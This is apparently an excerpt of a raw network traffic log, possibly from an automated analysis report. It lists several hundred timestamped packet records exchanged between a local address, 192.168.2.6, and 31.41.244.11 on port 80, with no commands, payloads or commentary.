                                                                                                                                                              Dec 18, 2024 11:47:17.122503996 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.122545004 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.122594118 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.122632027 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.123675108 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.123713970 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.123800039 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.123840094 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.124839067 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.124878883 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.124938965 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.124974966 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.126214981 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.126254082 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.126338005 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.126377106 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.127603054 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.127645969 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.127671957 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.127707958 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.128380060 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.128420115 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.128479004 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.128515005 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.129529953 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.129568100 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.129627943 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.129664898 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.130697966 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.130736113 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.130794048 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.130829096 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.131912947 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.131952047 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.132025003 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.132059097 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.133114100 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.133227110 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.133317947 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.134213924 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.134330988 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.134385109 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.135376930 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.135565996 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.135616064 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.136588097 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.136704922 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.136750937 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.137784958 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.137888908 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.137928963 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.138912916 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.139101982 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.139151096 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.140101910 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.140259981 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.140311956 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.141238928 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.141344070 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.141392946 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.142410994 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.142518044 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.142570972 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.143578053 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.143682003 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.143728971 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.144738913 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.144860983 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.144908905 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.145925045 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.146034956 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.146081924 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.147109032 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.147193909 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.147243977 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.148251057 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.148364067 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.148401022 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.149418116 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.149457932 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.149513960 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.150198936 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.150630951 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.150686026 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.150726080 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.151781082 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.151978970 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.152023077 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.152954102 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.153045893 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.153096914 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.154112101 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.154203892 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.154228926 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.155276060 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.155325890 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.155375957 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.156475067 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.156519890 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.156573057 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.157701015 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.157749891 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.157794952 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.158195019 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.158808947 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.158986092 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.159033060 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.160449982 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.160573959 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.160614967 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.161551952 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.161634922 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.161704063 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.162719011 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.162756920 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.162782907 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.162817955 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.163749933 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.163785934 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.163882971 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.163919926 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.164845943 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.164887905 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.164927006 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.164962053 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.165813923 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.165853024 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.165896893 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.166038990 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.167004108 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.167042017 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.167143106 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.167180061 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.168171883 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.168205976 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.168255091 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.168291092 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.298877001 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.299005985 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.299127102 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.299293041 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.299478054 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.299638987 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.300293922 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.300354958 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.300357103 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.300395012 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.302294016 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.302604914 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.302618980 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.302668095 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.302707911 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.302721977 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.303486109 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.303582907 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.303636074 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.304440975 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.304574966 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.304626942 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.305438042 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.305511951 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.305701971 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.306210995 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.306564093 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.306613922 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.306657076 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.307528973 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.307646990 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.307698965 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.308679104 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.308785915 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.308840990 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.309866905 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.309979916 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.310024023 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.311073065 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.311175108 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.311220884 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.312546968 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.312598944 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.312659979 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.313385010 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.313427925 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.313492060 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.314208984 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.314519882 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.314570904 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.314609051 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.315707922 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.315826893 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.315870047 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.316868067 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.317024946 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.317064047 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.318038940 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.318077087 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.318130016 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.318198919 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.319212914 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.319251060 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.319374084 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.320391893 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.320445061 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.320473909 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.320569992 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.321598053 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.321639061 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.321664095 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.321682930 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.322710991 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.322871923 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.322916985 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.323874950 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.323975086 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.324027061 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.325045109 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.325146914 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.325196981 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.326270103 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.326395035 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.326443911 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.327465057 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.327513933 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.327569962 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.328579903 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.328624964 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.328687906 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.329760075 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.329772949 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.329799891 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.329819918 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.330897093 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.331010103 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.331048012 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.332081079 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.332174063 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.332221031 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.333197117 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.333534956 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.333581924 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.334549904 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.334687948 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.334744930 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.335586071 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.335701942 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.335743904 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.336760044 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.336837053 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.336886883 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.337944984 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.338054895 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.338100910 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.339086056 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.339193106 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.339241028 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.340246916 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.340348005 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.340392113 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.341423035 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.341542959 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.341609001 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.342580080 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.342735052 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.342885017 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.343750954 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.343938112 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.343992949 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.344926119 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.345036030 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.345088005 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.346101999 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.346162081 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.346210003 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.347349882 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.347390890 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.347413063 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.347498894 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.348444939 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.348565102 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.348681927 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.349606991 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.349705935 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.349741936 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.350931883 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.351913929 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.351944923 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.351960897 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.351982117 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.352196932 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.352231979 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.353106976 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.353163958 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.353189945 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.353368998 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.354341030 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.354378939 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.354444981 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.354621887 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.355648994 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.355671883 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.355699062 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.355711937 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.356635094 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.356690884 CET4980680192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:17.356749058 CET804980631.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:17.356789112 CET4980680192.168.2.631.41.244.11
